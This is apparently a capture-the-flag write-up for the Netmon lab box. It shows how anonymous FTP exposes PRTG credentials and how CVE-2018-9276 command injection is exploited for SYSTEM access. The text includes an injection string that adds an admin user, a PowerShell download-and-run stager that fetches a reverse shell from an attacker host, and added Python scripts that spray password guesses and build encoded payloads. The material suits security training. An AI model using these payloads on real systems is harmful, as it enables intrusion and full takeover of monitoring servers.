Netmon 
18th May 2019 / Document No D19.100.28
Prepared By: MinatoTW 
Machine Author: mrb3n 

 
Difficulty: Easy
Classification: Official 

Page 1 / 11 
 

SYNOPSIS
Netmon is an easy difficulty Windows box with simple enumeration and exploitation. PRTG Network Monitor is running, and an FTP server with anonymous access allows reading of the PRTG configuration files, which contain credentials. The installed version of PRTG is vulnerable to an authenticated command injection (CVE-2018-9276) which can be exploited to gain a SYSTEM shell.

Skills Required                Skills Learned

● Enumeration                  ● CVE-2018-9276 (PRTG Network Monitor notification command injection)
 

ENUMERATION 

NMAP

First scan all 65535 TCP ports quickly, then re-scan only the open ones with default scripts and version detection:

ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.152 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports 10.10.10.152
FTP is open with anonymous access allowed, and the whole C: drive appears to be exposed through it. PRTG Network Monitor is running on the web server on port 80, among other common Windows ports such as RPC and SMB.
 

FTP
Logging into FTP as anonymous we find the user flag in the Users\Public folder.

On checking the installed software under Program Files (x86) we find PRTG Network Monitor, which we came across earlier.

A quick Google search yields the PRTG documentation, according to which PRTG stores its configuration files in C:\ProgramData\Paessler\PRTG Network Monitor.

Going into the folder we find the configuration files. According to the documentation, "PRTG Configuration.dat" (the live configuration) and "PRTG Configuration.old" (the previous version of it) are standard files. However there is no mention of "PRTG Configuration.old.bak", a leftover backup copy that is worth a look.

Let’s download and inspect it.

get "PRTG Configuration.old.bak"

Scrolling down a bit (or simply searching the file for prtgadmin) we find the password for the user prtgadmin.
PRTG NETWORK MONITOR 
Using the credentials prtgadmin / PrTg@dmin2018 we try to log in to the web interface on port 80.

However the credentials refuse to work. Since the file is a backup of an old configuration, the password was most likely rotated after it was taken. The old password ends in a year, so let’s follow the pattern and try "PrTg@dmin2019".

And we’re in as the Administrator.
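The year-rotation guess above can be automated. The following Python script is an added example and not part of the original writeup: it derives candidates from a recovered password whose trailing digits look like a year (newer years first, then the year before, then the original in case it was never changed) and tries each against the PRTG login form. The endpoint /public/checklogin.htm, the form fields and the redirect-based success check are assumptions about PRTG's web UI; the target address and username are the writeup's. Keep the candidate list short against a real target and check the account lockout policy first.

```python
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, List, Optional, Tuple

# Added example, not part of the original writeup. The login endpoint, form
# fields and success heuristic are assumptions about PRTG's web form; the
# target address and username come from the writeup.

YEAR_RE = re.compile(r"^(?P<stem>.*?)(?P<year>(?:19|20)\d{2})(?P<tail>\D*)$")


def year_candidates(leaked: str, ahead: int = 3, back: int = 1) -> List[str]:
    """Rotate a trailing year in a recovered password.

    Most likely guesses first: the years after the leaked one (rotated
    passwords usually move forward), then the year before, then the leaked
    value itself. Passwords without a year are returned unchanged.
    """
    m = YEAR_RE.match(leaked)
    if not m:
        return [leaked]
    stem, year, tail = m.group("stem"), int(m.group("year")), m.group("tail")
    years = [year + i for i in range(1, ahead + 1)] + [year - i for i in range(1, back + 1)]
    return [f"{stem}{y}{tail}" for y in years] + [leaked]


# A poster returns (HTTP status, Location header) for a form POST. It is
# injected so the spray loop can be exercised offline with a fake.
Poster = Callable[[str, dict], Tuple[int, str]]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # surface the 302 instead of following it


def urllib_post(url: str, data: dict) -> Tuple[int, str]:
    body = urllib.parse.urlencode(data).encode()
    req = urllib.request.Request(url, data=body, method="POST")
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, resp.headers.get("Location", "")
    except urllib.error.HTTPError as err:  # 302 lands here because of _NoRedirect
        return err.code, err.headers.get("Location", "")


def prtg_login_ok(base_url: str, username: str, password: str,
                  post: Poster = urllib_post) -> bool:
    """Assumption: the PRTG login form posts to /public/checklogin.htm and a
    successful login answers with a redirect away from the login page, while
    a failed one either re-renders the login page or redirects back to it."""
    status, location = post(f"{base_url}/public/checklogin.htm",
                            {"loginurl": "", "username": username, "password": password})
    return status == 302 and "login" not in location.lower()


def find_password(base_url: str, username: str, leaked: str,
                  post: Poster = urllib_post) -> Optional[str]:
    """Try each candidate in order and return the first one that logs in."""
    for candidate in year_candidates(leaked):
        if prtg_login_ok(base_url, username, candidate, post):
            return candidate
    return None


if __name__ == "__main__":
    print(find_password("http://10.10.10.152", "prtgadmin", "PrTg@dmin2018"))
```

The `post` parameter exists so the loop can be driven by a fake during testing; against the box, the default urllib poster is used and the first hit is printed.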

 

FOOTHOLD 

From the web interface (the version is shown in the page footer) we find the version to be 18.1.37.

A Google search for vulnerabilities in this version yields CVE-2018-9276, an authenticated OS command injection affecting PRTG versions prior to 18.2.39.

According to this article, RCE can be achieved while triggering notifications: the "Execute Program" notification type passes the user-supplied parameter string to a demo script unsanitised, so shell metacharacters such as | and ; let us run arbitrary commands. The PRTG core server runs as SYSTEM by default, so the injected command runs as SYSTEM too. Let’s try exploiting it.

Click on Setup > Account Settings > Notifications.

Now click on "Add new notification" on the extreme right.

Leave the default fields as they are and scroll down to the "Execute Program" section. We can add a user and put it in the local Administrators group by entering the following as the parameter. abc.txt is a harmless argument for the script; everything after the pipe is executed as a separate command, and the semicolon chains a second one:

abc.txt | net user htb abc123! /add ; net localgroup administrators htb /add

Make the following changes and click "Save".

Now, on the extreme right of the notification name, click on the edit icon and then the bell icon to test the notification, which triggers it.

Once done, use psexec.py from Impacket to log in over SMB as the created admin user:

psexec.py htb:'abc123!'@10.10.10.152

And we have a shell as SYSTEM, since psexec runs its service binary under the SYSTEM account.

ALTERNATE WAY 

In case we don’t want to add a user (better OPSEC), we can get a reverse shell instead. However, PRTG HTML-encodes the parameter field, so characters such as quotes, angle brackets and ampersands in a raw PowerShell one-liner get mangled. We can bypass this with PowerShell’s -EncodedCommand (-enc) switch, because base64 output only uses letters, digits, +, / and =, none of which are touched by HTML encoding.

We need to create a base64 encoded command. However, it must use the encoding Windows PowerShell expects for -enc, i.e. UTF-16LE; base64 of the UTF-8 bytes will decode to garbage on the target.

echo -n "IEX(new-object net.webclient).downloadstring('http://10.10.16.32/Invoke-PowerShellTcp.ps1')" | iconv -t UTF-16LE | base64 -w0

We use iconv to convert the command to the target encoding and base64 -w0 to print the result on a single line. The command itself downloads and executes Invoke-PowerShellTcp, a reverse shell from Nishang, from our machine.
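The encoding step and the two parameter formats, as an added Python example that is not part of the original writeup (it also covers the user-add parameter from the Foothold section). It reproduces the iconv | base64 step, shows why UTF-8 is the wrong choice, builds the "abc.txt | ..." parameter for both a plain command and an encoded PowerShell payload, and checks with html.escape that the encoded form contains nothing HTML encoding would change. The stager URL and dummy file name are the writeup's values; the html.escape check is an approximation of PRTG's own encoding.

```python
import base64
import html

# Added example, not from the writeup. Reproduces the iconv | base64 step in
# Python and builds the two kinds of "Execute Program" parameter used above.
# The stager URL and dummy file name are the writeup's values.

DUMMY_FILE = "abc.txt"  # harmless argument that satisfies the demo script

STAGER = ("IEX(new-object net.webclient).downloadstring("
          "'http://10.10.16.32/Invoke-PowerShellTcp.ps1')")


def encode_powershell_command(command: str) -> str:
    """Base64 for powershell -EncodedCommand: the bytes must be UTF-16LE."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def utf8_base64(command: str) -> str:
    """The common mistake: base64 of the UTF-8 bytes. PowerShell decodes this
    as UTF-16LE and gets garbage, which is what the iconv step avoids."""
    return base64.b64encode(command.encode("utf-8")).decode("ascii")


def decode_powershell_command(blob: str) -> str:
    """What powershell.exe does with the -enc argument."""
    return base64.b64decode(blob).decode("utf-16-le")


def raw_parameter(command: str) -> str:
    """Parameter for a plain command: satisfy the script's argument, then
    break out with a pipe so the rest runs as its own command."""
    return f"{DUMMY_FILE} | {command}"


def encoded_parameter(ps_command: str) -> str:
    """Parameter for a PowerShell payload that contains characters PRTG
    would HTML-encode (quotes, angle brackets, ampersands)."""
    return raw_parameter(f"powershell -enc {encode_powershell_command(ps_command)}")


def survives_html_encoding(parameter: str) -> bool:
    """True if HTML-escaping leaves the parameter unchanged, i.e. nothing in
    it will be mangled on the way into the notification (approximation of
    PRTG's encoding using html.escape)."""
    return html.escape(parameter, quote=True) == parameter


if __name__ == "__main__":
    print(raw_parameter("net user htb abc123! /add ; net localgroup administrators htb /add"))
    print(encoded_parameter(STAGER))
```

Running the script prints both parameters ready to paste into the notification; the second one is the same string the iconv | base64 pipeline produces.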

Download the script and append the invocation to its last line, so that the reverse shell connects back to us as soon as the script is loaded:

echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.32 -Port 4444' >> Invoke-PowerShellTcp.ps1
Now start a simple HTTP server in the directory containing the script, start a listener on port 4444, and create a new notification. This time the parameter would be:

abc.txt | powershell -enc SQBFAFgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANgAuADMAMgAvAEkAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAGMAcAAuAHAAcwAxACcAKQA=

python3 -m http.server 80

And trigger it.

And we have a SYSTEM shell.